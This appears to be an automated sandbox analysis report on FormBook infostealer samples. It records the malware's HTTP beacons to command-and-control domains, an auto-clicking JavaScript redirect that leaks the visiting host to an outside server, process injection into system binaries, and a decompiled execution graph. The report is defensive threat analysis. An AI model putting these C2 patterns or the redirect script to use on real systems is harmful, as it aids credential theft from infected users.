                                                          Data Ascii: KBEhCJ=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBnGKboR31WcL8Z1djdB9is72GPKo8uFb8Cmq+F2JQMA+vgVGt/jUYSyY6Oj4iaXpNdp6UNoFNqSnJX3Tg2ftoxqyqSAg5ynmtjyxD+Phjh+MFMmqGGrGCHdGL2UWtJ4Ep6GS+c83qsD0asRYUAY9Y2I9rs626hsuCCK00BmaJybsZUuWSSWEdCEo+6X04B39nuNV93AXvA3U3QCCStxBY6KTVKM581zLhs8F4B0wsSifMvqkhCaguOigwwAySHf0K5JqwavZpYhKcmyTzKTWx3MQTHnNjI2TBg+mk9lg3IAryk6EFMubuvJYay1Ag3fLMuABsYQ4hl8lNQGF7TvjZvkr96kvqSc/h5e1TrjZQwd4FcrA5KLCNsarfa5qmFLqaDhFaqyHc7epcyKR4MSZ688pWyaQN9rRFcaZ0L0/t+8NacAL7h7PIC6xVpW+1yUsgiCZffMqWzbOmPSxFJHVCUUkoXZ65ZSf7417l+2+ZOtCjgHuwjM5V4OGPU1s8dZVKGXf0n+ChT/3Y7jsks1TgHQNWguMCwUDWOi47rVVxJBjUpDPHn3XT586TaHZN4AfmR+uWQMTkk9kfpJjayOt4HjdfDGSFfZsBiGND93JFDBM91mv6IgeGV5lVjj/o8WmxTm5xe/48y8i68Kiw8Xpyad5PmDYiZERyMWytPvhMh+GKkIgQFyLYiPYeUW9RBnjjBWjfhgcX6mSwnSysVCsrkPhW/VHAeAgBlXrwBVQVmEukXjwtcW9bPXd1CowxnPz6bxzzgC7NqqlbZx5GKfi9VK09Gf9OwhUCARvLfgG8VBy3q3QDY+OPivVlu9p+6rfQh5/aRkT6Xl6WVYsa2dUuBACa6pOGVbpvVNSrTkhoVGHisd4Y2W8vvhNiLyGWramj6b5DthvXjGeJBE8SLJowiKFgiqI1Ws9xRkck81TcGY3cWpDtEkvwIHP7hMltBnCosFKw [TRUNCATED]
                                                          Jan 11, 2025 01:41:25.126048088 CET533INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 358
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.55000127.124.4.246803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:41:26.898700953 CET377OUTGET /36be/?KBEhCJ=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&Kdr=RN-HMNoXj6pXm HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          Host: www.laohub10.net
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Jan 11, 2025 01:41:27.652823925 CET533INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 358
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.550002188.114.96.3803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:41:32.791568041 CET635OUTPOST /kf1m/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.zkdamdjj.shop
                                                          Origin: http://www.zkdamdjj.shop
                                                          Referer: http://www.zkdamdjj.shop/kf1m/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 4a 31 63 58 48 65 4e 38 6e 34 79 33 37 51 49 45 50 47 61 42 49 46 48 4c 5a 73 31 35 67 62 67 73 4c 34 74 56 47 5a 4d 30 4c 7a 58 31 48 71 66 70 38 6e 31 66 52 64 52 59 42 4f 7a 39 41 33 4e 44 2f 70 5a 32 6b 30 4a 66 49 53 58 66 63 42 49 71 67 34 5a 74 2b 32 6c 4f 6a 54 6c 4a 4a 4c 77 49 4e 38 63 77 31 33 52 75 73 39 36 51 76 70 2f 7a 35 48 67 42 4b 6a 2b 67 63 36 6a 6f 4f 6e 67 4a 79 63 63 66 61 42 75 43 49 34 53 63 57 43 51 30 36 75 53 36 7a 4f 36 2b 53 44 34 4b 2f 6f 56 67 74 4a 53 38 64 41 56 70 4e 6c 6f 6e 35 62 4f 65 6e 62 46 57 6c 63 38 54 64 67 3d
                                                          Data Ascii: KBEhCJ=tBXlMSkIxJ8XDJ1cXHeN8n4y37QIEPGaBIFHLZs15gbgsL4tVGZM0LzX1Hqfp8n1fRdRYBOz9A3ND/pZ2k0JfISXfcBIqg4Zt+2lOjTlJJLwIN8cw13Rus96Qvp/z5HgBKj+gc6joOngJyccfaBuCI4ScWCQ06uS6zO6+SD4K/oVgtJS8dAVpNlon5bOenbFWlc8Tdg=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.550003188.114.96.3803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:41:35.338614941 CET655OUTPOST /kf1m/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 227
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.zkdamdjj.shop
                                                          Origin: http://www.zkdamdjj.shop
                                                          Referer: http://www.zkdamdjj.shop/kf1m/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 2f 67 74 75 63 74 57 45 78 4d 33 4c 7a 58 2b 6e 72 30 30 73 6e 69 66 52 5a 6a 59 44 71 7a 39 45 6e 4e 44 2b 5a 5a 78 58 4d 49 65 59 53 56 58 38 42 4f 6b 41 34 5a 74 2b 32 6c 4f 6a 75 4f 4a 4a 54 77 49 5a 41 63 68 6b 33 57 74 73 39 6c 56 76 70 2f 33 35 48 6b 42 4b 69 72 67 64 57 64 6f 4d 76 67 4a 32 4d 63 65 4f 31 74 52 6f 34 51 44 47 44 62 35 4a 72 34 69 53 6d 58 6a 7a 58 39 52 2f 77 31 68 62 34 34 6d 2f 49 39 36 74 4a 51 33 71 54 35 50 58 36 73 4d 47 4d 4d 4e 4b 32 35 50 45 77 39 31 76 57 62 74 4f 56 49 58 45 45 51 75 31 41 6c
                                                          Data Ascii: KBEhCJ=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T/gtuctWExM3LzX+nr00snifRZjYDqz9EnND+ZZxXMIeYSVX8BOkA4Zt+2lOjuOJJTwIZAchk3Wts9lVvp/35HkBKirgdWdoMvgJ2MceO1tRo4QDGDb5Jr4iSmXjzX9R/w1hb44m/I96tJQ3qT5PX6sMGMMNK25PEw91vWbtOVIXEEQu1Al


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.550004188.114.96.3803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:41:37.919285059 CET1672OUTPOST /kf1m/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.zkdamdjj.shop
                                                          Origin: http://www.zkdamdjj.shop
                                                          Referer: http://www.zkdamdjj.shop/kf1m/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 33 67 74 59 51 74 55 6c 78 4d 32 4c 7a 58 33 48 71 54 30 73 6d 67 66 52 67 71 59 44 57 4a 39 43 37 4e 43 63 52 5a 77 6d 4d 49 55 59 53 56 49 73 42 4c 71 67 35 45 74 2b 6e 73 4f 69 43 4f 4a 4a 54 77 49 66 6b 63 68 31 33 57 72 73 39 36 51 76 70 4a 7a 35 48 41 42 4b 37 63 67 64 6a 6d 30 76 58 67 4b 57 63 63 63 39 64 74 4c 6f 34 57 43 47 43 62 35 4f 6a 6a 69 53 71 74 6a 79 53 53 52 39 67 31 73 65 6c 66 39 65 45 6d 76 62 74 66 34 72 48 55 4f 41 53 79 47 6b 39 32 48 4b 4f 65 45 51 34 47 35 4b 43 55 6b 2f 6f 55 49 42 63 45 71 42 74 76 56 53 4a 77 7a 69 6c 36 53 52 36 46 4a 36 78 31 35 66 50 4b 79 34 46 66 66 63 70 4b 36 68 63 62 31 56 75 6f 7a 46 31 49 4a 31 37 72 77 47 6a 2f 4a 2b 32 44 39 39 59 6d 4b 70 32 42 78 64 62 4b 34 47 38 66 47 55 4e 6d 57 46 6a 4a 7a 6f 61 4c 56 50 58 45 4b 6a 2b 53 79 54 56 41 75 59 70 49 79 44 69 71 53 68 30 62 35 47 6c 70 42 37 56 [TRUNCATED]
                                                          Data Ascii: KBEhCJ=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T3gtYQtUlxM2LzX3HqT0smgfRgqYDWJ9C7NCcRZwmMIUYSVIsBLqg5Et+nsOiCOJJTwIfkch13Wrs96QvpJz5HABK7cgdjm0vXgKWccc9dtLo4WCGCb5OjjiSqtjySSR9g1self9eEmvbtf4rHUOASyGk92HKOeEQ4G5KCUk/oUIBcEqBtvVSJwzil6SR6FJ6x15fPKy4FffcpK6hcb1VuozF1IJ17rwGj/J+2D99YmKp2BxdbK4G8fGUNmWFjJzoaLVPXEKj+SyTVAuYpIyDiqSh0b5GlpB7VAhDsHO07fivWF0h7d3lPjJst98+w9h/BAcpUEXB18/+05nZaoR1Fy9E1VURXpMw5hkC1AJnuo7nP/8wkefZFFfH8aKZZU0Tg8KYVkL91XIk3f83UW5z+SvZJWI/IqM39R++SfHxQLRpS30tW74SkvfW6ILteCaxnRIdx4EASleOAm3ilTUOyWopWpsjRShsRXIFKYXjR0ex6m3na/hatVKa17jtBFg8RjLm3inQ1CK2U68f9VPMPkpBlHHE+38R3TegZo7uyUvZJSC4r298uyTIJC2YMjK7kCRzUzWYrnaiYAaj825qtqqkI3TNGY6kGpoei56A8YFMK0D7Z8IUggG0zpf/SXWEeI0+pS4ZzLVqIA+fiGTBtGJbFFkVMasF6oRnHz9GDLrTZc9vdM4W3Dypp42ylRS/13jcLlRIEo8XRbEUfW9YGdt4YNRnxIXZXaG4OYrKcyvW/u3GP4cHGEPXcBb37NPSpkRIMLGKeOynN2zk7j1KvyfJRvGQF2MRLQpaDr3ws9fa1NiOC3J/1m2IIXMiztwUoHgs1GgrL5/kCgyqf1xZb2KmGp3LsyjlC4jJnDJzCbS0RXy6TXE4hzwasPP59E3XXli4bDBQ0Y0gH0Pp+zxcvRY58PpkK3bA1ve0qTdboHv30CfuYKNHRw6SWPTvWxagbcV [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.550005188.114.96.3803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:41:40.592025042 CET378OUTGET /kf1m/?KBEhCJ=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&Kdr=RN-HMNoXj6pXm HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          Host: www.zkdamdjj.shop
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Jan 11, 2025 01:42:19.974260092 CET968INHTTP/1.1 522
                                                          Date: Sat, 11 Jan 2025 00:42:19 GMT
                                                          Content-Type: text/plain; charset=UTF-8
                                                          Content-Length: 15
                                                          Connection: close
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2F41AZ5AvCHBIA25iI%2BQcVquvGViDRFSxG9T5AAtnPxBK6Cvo9F%2BQYfmC3Sn%2F10RsQSVIoPzSgzMi%2F1aZtSF0bp2r1vwsfeiNxMKzzcKMt%2FXAin9PRq0PsGftiAbZ%2BaohG8VJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          X-Frame-Options: SAMEORIGIN
                                                          Referrer-Policy: same-origin
                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Server: cloudflare
                                                          CF-RAY: 9000dcceee1643bf-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1554&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=378&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                          Data Ascii: error code: 522


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:19:39:12
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\tfWjjV1LdT.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\tfWjjV1LdT.exe"
                                                          Imagebase:0x690000
                                                          File size:1'225'216 bytes
                                                          MD5 hash:C3689A08E5E324CDE3000E0DA0261633
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:19:39:16
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\tfWjjV1LdT.exe"
                                                          Imagebase:0x8e0000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2308790702.0000000005B70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2307717085.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2308275736.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:19:39:30
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe"
                                                          Imagebase:0x900000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3896622402.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:5
                                                          Start time:19:39:31
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\mobsync.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                          Imagebase:0x3e0000
                                                          File size:93'696 bytes
                                                          MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3895579056.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3896453631.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3896511474.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:19:39:45
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe"
                                                          Imagebase:0x900000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:8
                                                          Start time:19:39:58
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff79f9e0000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:3.8%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:6.7%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:61
                                                            execution_graph 100982 6cfdfc 101022 69ab30 Mailbox _memmove 100982->101022 100984 6e617e Mailbox 59 API calls 101007 69a057 100984->101007 100988 69b525 101202 6f9e4a 89 API calls 4 library calls 100988->101202 100989 6d0055 101197 6f9e4a 89 API calls 4 library calls 100989->101197 100992 69b475 101198 698047 100992->101198 100994 6d0064 100995 6b0db6 59 API calls Mailbox 101005 699f37 Mailbox 100995->101005 100996 698047 59 API calls 100996->101005 100997 69b47a 100997->100989 101010 6d09e5 100997->101010 101002 697667 59 API calls 101002->101005 101003 6e6e8f 59 API calls 101003->101005 101004 6b2d40 67 API calls __cinit 101004->101005 101005->100989 101005->100992 101005->100995 101005->100996 101005->100997 101005->101002 101005->101003 101005->101004 101005->101007 101008 6d09d6 101005->101008 101011 69a55a 101005->101011 101175 69c8c0 331 API calls 2 library calls 101005->101175 101176 69b900 60 API calls Mailbox 101005->101176 101205 6f9e4a 89 API calls 4 library calls 101008->101205 101206 6f9e4a 89 API calls 4 library calls 101010->101206 101204 6f9e4a 89 API calls 4 library calls 101011->101204 101014 6b0db6 59 API calls Mailbox 101014->101022 101015 69b2b6 101195 69f6a3 331 API calls 101015->101195 101018 6d086a 101019 699c90 Mailbox 59 API calls 101018->101019 101023 6d085c 101019->101023 101020 6d0878 101203 6f9e4a 89 API calls 4 library calls 101020->101203 101022->100988 101022->101005 101022->101007 101022->101014 101022->101015 101022->101018 101022->101020 101022->101023 101024 69b21c 101022->101024 101027 6e6e8f 59 API calls 101022->101027 101034 699ea0 101022->101034 101058 70445a 101022->101058 101067 70df37 101022->101067 101070 71241e 101022->101070 101083 6f8715 101022->101083 101087 70df23 101022->101087 101090 70c2e0 101022->101090 101122 6f7956 101022->101122 101128 697de1 101022->101128 101132 70bc6b 101022->101132 101172 6e617e 101022->101172 101177 699c90 101022->101177 101196 70c193 85 API calls 2 library calls 101022->101196 101023->100984 101023->101007 101182 699d3c 101024->101182 101026 69b22d 101028 699d3c 60 API calls 101026->101028 101027->101022 101028->101015 101035 699ebf 101034->101035 101055 699eed Mailbox 101034->101055 101207 6b0db6 101035->101207 101037 69b47a 101042 6d09e5 101037->101042 101043 6d0055 101037->101043 101038 69b475 101039 698047 59 API calls 101038->101039 101040 69a057 101039->101040 101040->101022 101041 6e6e8f 59 API calls 101041->101055 101222 6f9e4a 89 API calls 4 library calls 101042->101222 101219 6f9e4a 89 API calls 4 library calls 101043->101219 101044 697667 59 API calls 101044->101055 101045 6b0db6 59 API calls Mailbox 101045->101055 101049 6b2d40 67 API calls __cinit 101049->101055 101050 6d0064 101050->101022 101051 698047 59 API calls 101051->101055 101054 6d09d6 101221 6f9e4a 89 API calls 4 library calls 101054->101221 101055->101037 101055->101038 101055->101040 101055->101041 101055->101043 101055->101044 101055->101045 101055->101049 101055->101051 101055->101054 101057 69a55a 101055->101057 101217 69c8c0 331 API calls 2 library calls 101055->101217 101218 69b900 60 API calls Mailbox 101055->101218 101220 6f9e4a 89 API calls 4 library calls 101057->101220 101251 699837 101058->101251 101062 7044c9 101066 7044cd 101062->101066 101294 699a98 59 API calls Mailbox 101062->101294 101063 7044a4 101063->101062 101064 699ea0 331 API calls 101063->101064 101064->101062 101066->101022 101323 70cadd 101067->101323 101069 70df47 101069->101022 101071 699837 84 API calls 101070->101071 101072 712436 101071->101072 101073 697667 59 API calls 101072->101073 101074 712444 101073->101074 101458 699b3c 101074->101458 101076 71244f 101077 712479 101076->101077 101079 699837 84 API calls 101076->101079 101462 699a3c 59 API calls Mailbox 101077->101462 101081 71246a 101079->101081 101080 712485 Mailbox 101080->101022 101082 69784b 59 API calls 101081->101082 101082->101077 101084 6f871e 101083->101084 101085 6f8723 101083->101085 101464 6f77b3 101084->101464 101085->101022 101088 70cadd 130 API calls 101087->101088 101089 70df33 101088->101089 101089->101022 101091 697667 59 API calls 101090->101091 101092 70c2f4 101091->101092 101093 697667 59 API calls 101092->101093 101094 70c2fc 101093->101094 101095 697667 59 API calls 101094->101095 101096 70c304 101095->101096 101097 699837 84 API calls 101096->101097 101120 70c312 101097->101120 101098 697924 59 API calls 101098->101120 101099 697bcc 59 API calls 101099->101120 101100 70c4fb 101101 70c528 Mailbox 101100->101101 101505 699a3c 59 API calls Mailbox 101100->101505 101101->101022 101103 70c4e2 101489 697cab 101103->101489 101104 698047 59 API calls 101104->101120 101106 70c4fd 101108 697cab 59 API calls 101106->101108 101111 70c50c 101108->101111 101109 697e4f 59 API calls 101112 70c3a9 CharUpperBuffW 101109->101112 101113 697b2e 59 API calls 101111->101113 101487 69843a 68 API calls 101112->101487 101113->101100 101114 697e4f 59 API calls 101115 70c469 CharUpperBuffW 101114->101115 101488 69c5a7 69 API calls 2 library calls 101115->101488 101118 699837 84 API calls 101118->101120 101119 697b2e 59 API calls 101119->101120 101120->101098 101120->101099 101120->101100 101120->101101 101120->101103 101120->101104 101120->101106 101120->101109 101120->101114 101120->101118 101120->101119 101121 697cab 59 API calls 101120->101121 101121->101120 101123 6f7962 101122->101123 101124 6b0db6 Mailbox 59 API calls 101123->101124 101125 6f7970 101124->101125 101126 6f797e 101125->101126 101127 697667 59 API calls 101125->101127 101126->101022 101127->101126 101129 697df0 __wsetenvp _memmove 101128->101129 101130 6b0db6 Mailbox 59 API calls 101129->101130 101131 697e2e 101130->101131 101131->101022 101133 70bcb0 101132->101133 101134 70bc96 101132->101134 101519 70a213 59 API calls Mailbox 101133->101519 101518 6f9e4a 89 API calls 4 library calls 101134->101518 101137 70bcbb 101138 699ea0 330 API calls 101137->101138 101139 70bd1c 101138->101139 101140 70bca8 Mailbox 101139->101140 101141 70bdae 101139->101141 101144 70bd5d 101139->101144 101140->101022 101142 70be04 101141->101142 101143 70bdb4 101141->101143 101142->101140 101145 699837 84 API calls 101142->101145 101540 6f791a 59 API calls 101143->101540 101520 6f72df 